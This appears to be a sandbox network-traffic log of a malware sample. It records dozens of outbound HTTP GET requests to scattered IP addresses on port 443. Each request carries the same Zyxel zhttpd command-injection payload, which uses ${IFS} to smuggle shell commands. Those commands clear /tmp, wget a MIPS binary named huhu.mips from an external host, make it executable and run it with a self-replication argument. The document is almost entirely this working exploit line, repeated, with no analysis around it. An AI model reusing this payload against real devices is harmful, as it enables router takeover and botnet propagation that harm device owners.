                                                Jan 29, 2024 07:07:51.405436039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5062192.168.2.235427680.64.109.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405483961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5063192.168.2.234615884.104.13.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405535936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5064192.168.2.2350364159.136.139.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405581951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5065192.168.2.2337554113.178.127.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405605078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5066192.168.2.234341248.84.36.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405644894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5067192.168.2.233714078.102.126.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405673027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5068192.168.2.2345234175.199.240.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405714989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5069192.168.2.2345008196.189.90.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405750990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5070192.168.2.2334402172.219.4.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405811071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5071192.168.2.235088284.156.88.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405847073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5072192.168.2.2334848198.38.205.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405864954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5073192.168.2.233900090.5.187.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405917883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5074192.168.2.2348656223.58.85.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405962944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5075192.168.2.2356598180.124.240.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406002998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5076192.168.2.2339580171.173.229.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406042099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5077192.168.2.2339786211.239.200.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406088114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5078192.168.2.23445342.144.170.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406120062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5079192.168.2.2344768134.34.80.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406174898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5080192.168.2.2338848216.187.141.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406204939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5081192.168.2.2355616121.246.178.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406227112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5082192.168.2.2336088175.79.197.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406249046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5083192.168.2.2348712146.195.62.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406287909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5084192.168.2.233720253.243.25.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406330109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5085192.168.2.233404861.81.165.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406377077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5086192.168.2.2333354164.81.89.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406429052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5087192.168.2.2358576107.39.28.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406465054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5088192.168.2.2360816148.49.233.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406502008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5089192.168.2.235814489.57.23.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406537056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5090192.168.2.2357024168.224.202.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406562090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5091192.168.2.235767062.205.191.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406601906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5092192.168.2.2333176195.93.39.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406622887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5093192.168.2.2354172109.33.50.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406663895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5094192.168.2.234627038.18.13.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406697989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5095192.168.2.2341288119.139.91.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406740904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5096192.168.2.2349022116.49.179.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406769991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5097192.168.2.23457384.182.253.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406799078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5098192.168.2.2338526103.109.237.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406835079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5099192.168.2.2356056132.254.139.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406891108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5100192.168.2.234201832.56.184.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406927109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5101192.168.2.2353186210.111.5.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.406965971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5102192.168.2.233800423.173.150.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407015085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5103192.168.2.234930288.165.252.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407075882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5104192.168.2.235230877.210.178.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407097101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5105192.168.2.235171690.195.217.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407128096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5106192.168.2.2341622116.112.153.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407170057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5107192.168.2.236055866.210.13.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407224894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5108192.168.2.235008465.204.55.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407254934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5109192.168.2.2351324196.32.249.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407277107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5110192.168.2.2350100203.15.37.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407347918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5111192.168.2.2360272171.56.121.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407382011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5112192.168.2.234482014.88.104.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407429934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5113192.168.2.2336268163.89.63.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407470942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5114192.168.2.2340458162.226.51.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407526016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5115192.168.2.235028635.253.50.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407562971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5116192.168.2.2334926179.198.167.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407601118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5117192.168.2.2347500120.53.184.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407627106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5118192.168.2.235900220.122.21.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407660961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5119192.168.2.233419472.116.92.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407713890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5120192.168.2.235230292.43.103.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407732964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5121192.168.2.2357688217.148.64.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407778978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5122192.168.2.235271892.109.86.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407816887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5123192.168.2.2334810155.241.152.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407849073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5124192.168.2.233719863.10.202.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407887936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5125192.168.2.2357306122.190.224.58443
                                                TimestampBytes transferredDirectionData
